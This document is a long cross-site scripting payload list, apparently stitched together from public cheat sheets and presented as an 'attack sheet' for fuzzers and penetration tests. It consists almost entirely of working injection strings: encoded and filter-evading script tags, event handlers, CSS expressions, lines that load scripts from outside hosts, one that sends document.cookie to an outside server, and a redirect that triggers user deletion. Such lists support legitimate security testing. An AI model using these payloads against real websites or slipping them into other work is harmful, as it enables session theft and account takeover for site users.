"><img src=x onerror=prompt(1)> [Click here](javascript:alert(1)) "></script><svg/onload=alert("XSS")> <iframe src="http://businessinfo.co.uk/labs/xss/xss.swf"></iframe> '|alert('xss')|' +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTUE9TRUQvKTwvc2NyaXB0Pg==# %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E &#x3C;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x65;&#x73;&#x74;&#x2E;&#x64;&#x65;&#x3E; &#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62 PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+ <img src=x onerror="this.src='http://deleteme.blackdoorsec.net/e.php?c=Correction'+document.cookie'" /> "><img src=x onclick=prompt(1)> "><img src=x ondblclick=prompt(1)> "><img src=x ondrag=prompt(1)> "><img src=x ondragend=prompt(1)> "><img src=x ondragenter=prompt(1)> "><img src=x ondragleave=prompt(1)> "><img src=x ondragover=prompt(1)> "><img src=x ondragstart=prompt(1)> "><img src=x ondrop=prompt(1)> "><img src=x onmousedown=prompt(1)> "><img src=x onmousemove=prompt(1)> "><img src=x onmouseout=prompt(1)> "><img src=x onmouseover=prompt(1)> "><img src=x onmouseup=prompt(1)> "><img src=x onmousewheel=prompt(1)> "><img src=x onscroll=prompt(1)> "><img src=x onwheel=prompt(1)> Her ----------------------------------------------- “ autofocusonfocus=alert(1)// “;alert(1)// ";document.body.addEventListener("DOMActivate",alert(1))// ";document.body.addEventListener("DOMActivate",prompt(1))// ";document.body.addEventListener("DOMActivate",confirm(1))// javascript:alert(1)// javascript&#00058;alert(1) javaSCRIPT&colon;alert(1) JaVaScRipT:alert(1) javas&Tab;cript:\u0061lert(1); javascript:\u0061lert&#x28;1&#x29 javascript&#x3A;alert&lpar;document&period;cookie&rpar; // AsharJaved -alert(1)- -prompt(1)- -confirm(1)- Der ---------------------------------------------------- "><img srx=x onerror=alert(1)> <script>alert(1)</script> <scr<script>ipt>alert(99)</scr<script>ipt> <a href=”javascript:alert(1)”>Clickme</a> <img/src=aaa.jpg onerror=prompt(1);> <video src=x onerror=prompt(1);> <audio src=x onerror=prompt(1);> <iframesrc="javascript:alert(2)"> <iframe src="http://businessinfo.co.uk/labs/xss/xss.swf"></iframe> <iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">. <embed/src=//goo.gl/nlX0P> <form action="Javascript:alert(1)"><input type=submit> <formaction='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK <table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6 <video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="> <object/data=//goo.gl/nlX0P? <isindexformaction="javascript:alert(1)" type=image> <input type="image" formaction=JaVaScript:alert(0)> <form><button formaction=javascript&colon;alert(1)>CLICKME <isindex action="javascript:alert(1)" type=image> <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image> <isindex action=data:text/html, type=image> <applet code="javascript:confirm(document.cookie);"> // Firefox Only <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg/onload=prompt(1);> <marquee/onstart=confirm(2)>/ <body onload=prompt(1);> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <video><source onerror="javascript:alert(1)"> <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)> <body language=vbsonload=alert-1 // Works with IE8 <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> // Works with IE8 <q/oncut=open()> <q/oncut=alert(1)> // Useful in-case of payload restrictions. <a onmouseover="javascript:window.onerror=alert;throw 1> <img src=x onerror="javascript:window.onerror=alert;throw 1"> <body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29'; <img style="xss:expression(alert(0))"> // Works upto IE7. <div style="color:rgb(''&#0;x:expression(alert(1))"></div> // Works upto IE7. <style>#test{x:expression(alert(/XSS/))}</style> // Works upto IE7 <a onmouseover=location=’javascript:alert(1)>click <body onfocus="location='javascrpt:alert(1) >123 <meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P"> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg> // By @secalert <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> // By Mario <svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"></svg> // By @secalert <meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <math><a xlink:href="//jsfiddle.net/t846h/">click // By Ashar Javed <svg><script>alert&#40/1/&#41</script> // Works With All Browsers <svg><script>alert&#40 1&#41 // Works with Opera Only ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40; &#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('XSS');"> <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(xss.htc);"> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: org/xss.swf" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY></HTML> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="h tt p://6 6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> _________ _________.__ __ _________ .__ __ .__ \_ ___ \_______ ____ ______ ______ / _____/|__|/ |_ ____ / _____/ ___________|__|______/ |_|__| ____ ____ / \ \/\_ __ \/ _ \/ ___// ___/ \_____ \ | \ __\/ __ \ \_____ \_/ ___\_ __ \ \____ \ __\ |/ \ / ___\ \ \____| | \( <_> )___ \ \___ \ / \| || | \ ___/ / \ \___| | \/ | |_> > | | | | \/ /_/ > \______ /|__| \____/____ >____ > /_______ /|__||__| \___ > /_______ /\___ >__| |__| __/|__| |__|___| /\___ / \/ \/ \/ \/ \/ \/ \/ |__| \//_____/ Information: A lot of people asked us regarding our cross site scripting pentest sheet for a fuzzer or own scripts. To have some good results you can use the following list with automatic scripts, software or for manually pentesting. This list goes out to all friends, nerds, pentester & exploiters. Please continue the List and we will update it soon. Note: This is a technical attack sheet for cross site penetrationtests. Cross Site Scripting Strings with TAG: <meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>"> <SCRIPT>document.cookie=true;</SCRIPT> <IMG SRC="jav ascript:document.cookie=true;"> <IMG SRC="javascript:document.cookie=true;"> <IMG SRC=" &#14; javascript:document.cookie=true;"> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;> <SCRIPT>document.cookie=true;//<</SCRIPT> <SCRIPT <B>document.cookie=true;</SCRIPT> <IMG SRC="javascript:document.cookie=true;"> <iframe src="javascript:document.cookie=true;> <SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> </TITLE><SCRIPT>document.cookie=true;</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;"> <BODY BACKGROUND="javascript:document.cookie=true;"> <BODY ONLOAD=document.cookie=true;> <IMG DYNSRC="javascript:document.cookie=true;"> <IMG LOWSRC="javascript:document.cookie=true;"> <BGSOUND SRC="javascript:document.cookie=true;"> <BR SIZE="&{document.cookie=true}"> <LAYER SRC="javascript:document.cookie=true;"></LAYER> <LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> <STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting ¼script¾document.cookie=true;¼/script¾ <IFRAME SRC="javascript:document.cookie=true;"></IFRAME> <FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET> <TABLE BACKGROUND="javascript:document.cookie=true;"> <TABLE><TD BACKGROUND="javascript:document.cookie=true;"> <DIV STYLE="background-image: url(javascript:document.cookie=true;)"> <DIV STYLE="background-image: url(&#1;javascript:document.cookie=true;)"> <DIV STYLE="width: expression(document.cookie=true);"> <STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE> <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)"> <CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> <STYLE TYPE="text/javascript">document.cookie=true;</STYLE> <STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> <STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> <SCRIPT>document.cookie=true;</SCRIPT> <BASE HREF="javascript:document.cookie=true;//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML> <? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- <a href="javascript#document.cookie=true;"> <div onmouseover="document.cookie=true;"> <img src="javascript:document.cookie=true;"> <img dynsrc="javascript:document.cookie=true;"> <input type="image" dynsrc="javascript:document.cookie=true;"> <bgsound src="javascript:document.cookie=true;"> &<script>document.cookie=true;</script> &{document.cookie=true;}; <img src=&{document.cookie=true;};> <link rel="stylesheet" href="javascript:document.cookie=true;"> <img src="mocha:document.cookie=true;"> <img src="livescript:document.cookie=true;"> <a href="about:<script>document.cookie=true;</script>"> <body onload="document.cookie=true;"> <div style="background-image: url(javascript:document.cookie=true;);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.cookie=true;);"> <style type="text/javascript">document.cookie=true;</style> <object classid="clsid:..." codebase="javascript:document.cookie=true;"> <style><!--</style><script>document.cookie=true;//--></script> <<script>document.cookie=true;</script> <script>document.cookie=true;//--></script> <!-- -- --><script>document.cookie=true;</script><!-- -- --> <img src="blah"onmouseover="document.cookie=true;"> <img src="blah>" onmouseover="document.cookie=true;"> <xml src="javascript:document.cookie=true;"> <xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings with close TAG: >"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> >"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>"> >"<SCRIPT>document.cookie=true;</SCRIPT> >"<IMG SRC="jav ascript:document.cookie=true;"> >"<IMG SRC="javascript:document.cookie=true;"> >"<IMG SRC=" &#14; javascript:document.cookie=true;"> >"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;> >"<SCRIPT>document.cookie=true;//<</SCRIPT> >"<SCRIPT <B>document.cookie=true;</SCRIPT> >"<IMG SRC="javascript:document.cookie=true;"> >"<iframe src="javascript:document.cookie=true;> >"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> >"</TITLE><SCRIPT>document.cookie=true;</SCRIPT> >"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;"> >"<BODY BACKGROUND="javascript:document.cookie=true;"> >"<BODY ONLOAD=document.cookie=true;> >"<IMG DYNSRC="javascript:document.cookie=true;"> >"<IMG LOWSRC="javascript:document.cookie=true;"> >"<BGSOUND SRC="javascript:document.cookie=true;"> >"<BR SIZE="&{document.cookie=true}"> >"<LAYER SRC="javascript:document.cookie=true;"></LAYER> >"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> >"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting >"¼script¾document.cookie=true;¼/script¾ >"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME> >"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET> >"<TABLE BACKGROUND="javascript:document.cookie=true;"> >"<TABLE><TD BACKGROUND="javascript:document.cookie=true;"> >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)"> >"<DIV STYLE="background-image: url(&#1;javascript:document.cookie=true;)"> >"<DIV STYLE="width: expression(document.cookie=true);"> >"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE> >"<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)"> >"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> >"exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> >"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> >"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> >"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> >"<SCRIPT>document.cookie=true;</SCRIPT> >"<BASE HREF="javascript:document.cookie=true;//"> >"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT> >"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> >"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> >"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML> >"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?> >"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- >"<a href="javascript#document.cookie=true;"> >"<div onmouseover="document.cookie=true;"> >"<img src="javascript:document.cookie=true;"> >"<img dynsrc="javascript:document.cookie=true;"> >"<input type="image" dynsrc="javascript:document.cookie=true;"> >"<bgsound src="javascript:document.cookie=true;"> >"&<script>document.cookie=true;</script> >"&{document.cookie=true;}; >"<img src=&{document.cookie=true;};> >"<link rel="stylesheet" href="javascript:document.cookie=true;"> >"<img src="mocha:document.cookie=true;"> >"<img src="livescript:document.cookie=true;"> >"<a href="about:<script>document.cookie=true;</script>"> >"<body onload="document.cookie=true;"> >"<div style="background-image: url(javascript:document.cookie=true;);"> >"<div style="behaviour: url([link to code]);"> >"<div style="binding: url([link to code]);"> >"<div style="width: expression(document.cookie=true;);"> >"<style type="text/javascript">document.cookie=true;</style> >"<object classid="clsid:..." codebase="javascript:document.cookie=true;"> >"<style><!--</style><script>document.cookie=true;//--></script> >"<<script>document.cookie=true;</script> >"<script>document.cookie=true;//--></script> >"<!-- -- --><script>document.cookie=true;</script><!-- -- --> >"<img src="blah"onmouseover="document.cookie=true;"> >"<img src="blah>" onmouseover="document.cookie=true;"> >"<xml src="javascript:document.cookie=true;"> >"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml> >"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings with negative value & TAG: -1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> -1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>"> -1<SCRIPT>document.cookie=true;</SCRIPT> -1<IMG SRC="jav ascript:document.cookie=true;"> -1<IMG SRC="javascript:document.cookie=true;"> -1<IMG SRC=" &#14; javascript:document.cookie=true;"> -1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;> -1<SCRIPT>document.cookie=true;//<</SCRIPT> -1<SCRIPT <B>document.cookie=true;</SCRIPT> -1<IMG SRC="javascript:document.cookie=true;"> -1<iframe src="javascript:document.cookie=true;> -1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> -1</TITLE><SCRIPT>document.cookie=true;</SCRIPT> -1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;"> -1<BODY BACKGROUND="javascript:document.cookie=true;"> -1<BODY ONLOAD=document.cookie=true;> -1<IMG DYNSRC="javascript:document.cookie=true;"> -1<IMG LOWSRC="javascript:document.cookie=true;"> -1<BGSOUND SRC="javascript:document.cookie=true;"> -1<BR SIZE="&{document.cookie=true}"> -1<LAYER SRC="javascript:document.cookie=true;"></LAYER> -1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;"> -1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting -1¼script¾document.cookie=true;¼/script¾ -1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME> -1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET> -1<TABLE BACKGROUND="javascript:document.cookie=true;"> -1<TABLE><TD BACKGROUND="javascript:document.cookie=true;"> -1<DIV STYLE="background-image: url(javascript:document.cookie=true;)"> -1<DIV STYLE="background-image: url(&#1;javascript:document.cookie=true;)"> -1<DIV STYLE="width: expression(document.cookie=true);"> -1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE> -1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)"> -1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> -1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> -1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> -1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> -1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> -1<SCRIPT>document.cookie=true;</SCRIPT> -1<BASE HREF="javascript:document.cookie=true;//"> -1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT> -1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> -1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> -1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML> -1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?> -1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- -1<a href="javascript#document.cookie=true;"> -1<div onmouseover="document.cookie=true;"> -1<img src="javascript:document.cookie=true;"> -1<img dynsrc="javascript:document.cookie=true;"> -1<input type="image" dynsrc="javascript:document.cookie=true;"> -1<bgsound src="javascript:document.cookie=true;"> -1&<script>document.cookie=true;</script> -1&{document.cookie=true;}; -1<img src=&{document.cookie=true;};> -1<link rel="stylesheet" href="javascript:document.cookie=true;"> -1<img src="mocha:document.cookie=true;"> -1<img src="livescript:document.cookie=true;"> -1<a href="about:<script>document.cookie=true;</script>"> -1<body onload="document.cookie=true;"> -1<div style="background-image: url(javascript:document.cookie=true;);"> -1<div style="behaviour: url([link to code]);"> -1<div style="binding: url([link to code]);"> -1<div style="width: expression(document.cookie=true;);"> -1<style type="text/javascript">document.cookie=true;</style> -1<object classid="clsid:..." codebase="javascript:document.cookie=true;"> -1<style><!--</style><script>document.cookie=true;//--></script> -1<<script>document.cookie=true;</script> -1<script>document.cookie=true;//--></script> -1<!-- -- --><script>document.cookie=true;</script><!-- -- --> -1<img src="blah"onmouseover="document.cookie=true;"> -1<img src="blah>" onmouseover="document.cookie=true;"> -1<xml 